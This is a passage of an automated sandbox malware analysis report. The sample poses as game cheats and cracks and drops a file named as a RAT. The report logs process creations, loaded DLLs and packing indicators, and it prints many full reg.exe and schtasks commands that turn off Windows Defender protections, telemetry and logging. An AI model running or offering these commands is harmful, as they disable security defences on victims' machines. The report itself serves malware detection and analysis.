Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: wKj1CBkbos.exe Static file information: File size 13565952 > 1048576
Source: wKj1CBkbos.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcede00
Binary contains a suspicious time stamp
Source: 52cheatand52rat.exe.0.dr Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
PE file contains sections with non-standard names
Source: Lunch LaCheatV2.exe.3.dr Static PE information: section name: .vmp0
Source: Lunch LaCheatV2.exe.3.dr Static PE information: section name: .vmp1
Source: Lunch LaCheat.exe.6.dr Static PE information: section name: .vmp0
Source: Lunch LaCheat.exe.6.dr Static PE information: section name: .vmp1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Code function: 2_2_00007FFD342B00BD pushad ; iretd 2_2_00007FFD342B00C1

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
